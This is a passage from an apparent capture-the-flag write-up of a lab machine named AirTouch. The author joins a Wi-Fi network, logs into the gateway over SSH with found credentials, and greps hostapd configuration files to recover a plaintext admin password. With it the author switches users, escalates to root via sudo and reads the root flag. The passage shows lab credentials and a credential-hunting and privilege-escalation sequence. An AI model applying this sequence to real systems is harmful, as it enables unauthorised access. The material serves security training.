DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 5 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 9 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 18 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 18 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 13 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 10 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 17 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 21 (xid=0xdb78581d)
DHCPOFFER of 10.10.10.98 from 10.10.10.1
DHCPREQUEST for 10.10.10.98 on wlan1 to 255.255.255.255 port 67 (xid=0x1d5878db)
DHCPACK of 10.10.10.98 from 10.10.10.1 (xid=0xdb78581d)
hostname: you must be root to change the host name
bound to 10.10.10.98 -- renewal in 344869 seconds.
Finally, I obtained the IP 10.10.10.98. Next, I used the credentials found remote : xGgWEwqUpfoOVsLeROeG to connect to the gateway.
root@AirTouch-Consultant:~/eaphammer# ssh remote@10.10.10.1
The authenticity of host '10.10.10.1 (10.10.10.1)' can't be established.
ECDSA key fingerprint is SHA256:/lSCXr95A71FBCcQ9DT1xXMFeCAsLEnCUfSwu/3qPoE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.1' (ECDSA) to the list of known hosts.
remote@10.10.10.1's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
remote@AirTouch-AP-MGT:~$Shell as root
Checking sudo permissions, I discovered I couldn't use sudo. Looking at the directories in /home, I found another user, admin. And upon checking processes with ps aux, I found hostapd running as root, pointing to the configuration files.
💡 Hostapd hostapd (Host Access Point Daemon) is software for Linux/BSD systems that transforms Wi-Fi network cards into access points (hotspots) and authentication servers. It allows management of IEEE 802.11, WPA/WPA2/WPA3 networks and acts as a RADIUS server, ideal for creating Wi-Fi routers with PCs or Raspberry Pi.
I then searched for any mention of admin in the hostapd configuration files.
remote@AirTouch-AP-MGT:/$ grep -r 'admin' /etc/hostapd/
/etc/hostapd/hostapd_wpe.conf.tmp:# text file that could be used, e.g., to populate the AP administration UI with
/etc/hostapd/hostapd_wpe.conf.tmp:# administered bit)
/etc/hostapd/hostapd_wpe.eap_user:"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
/etc/hostapd/hostapd_wpe2.conf.tmp:# text file that could be used, e.g., to populate the AP administration UI with
/etc/hostapd/hostapd_wpe2.conf.tmp:# administered bit)Reading the file /etc/hostapd/hostapd_wpe.eap_user, I found the admin credentials in plaintext.
# WPE - DO NOT REMOVE - These entries are specifically in here
* PEAP,TTLS,TLS,FAST
#"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2]
* PEAP,TTLS,TLS,FAST [ver=1]
#"t" GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
"AirTouch\r4ulcl" MSCHAPV2 "laboratory" [2]
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]With this, I was able to switch to the admin user.
remote@AirTouch-AP-MGT:/$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@AirTouch-AP-MGT:/$And admin could become root using sudo. Thus, I became root and retrieved the root flag.
admin@AirTouch-AP-MGT:/$ sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on AirTouch-AP-MGT:
(ALL) ALL
(ALL) NOPASSWD: ALL
admin@AirTouch-AP-MGT:/$ sudo -i
root@AirTouch-AP-MGT:~# ls
certs mgt root.txt start.sh wlan_config_aps
root@AirTouch-AP-MGT:~# cat root.txt
1b60483ac751f5adafb630c03c23ff94
root@AirTouch-AP-MGT:~#Conclusion
On this machine, I learned that network segmentation (VLANs) is ineffective if there are flaws in identity management and credential storage. I managed to jump from the Consultant VLAN to the Tablets VLAN and finally to the Corporate one due to password reuse and credentials exposed in router configuration files. It was also very cool to be able to perform wifi hacking again after so much time.
I really hope you enjoyed this step-by-step guide. If you did, please consider using the clap button as much as possible and subscribing so you don't miss future posts.
I'd also like to know what you thought of this machine and what problems you encountered. How about leaving your opinion in the comments section?
Thanks for reading to the end. See you next time!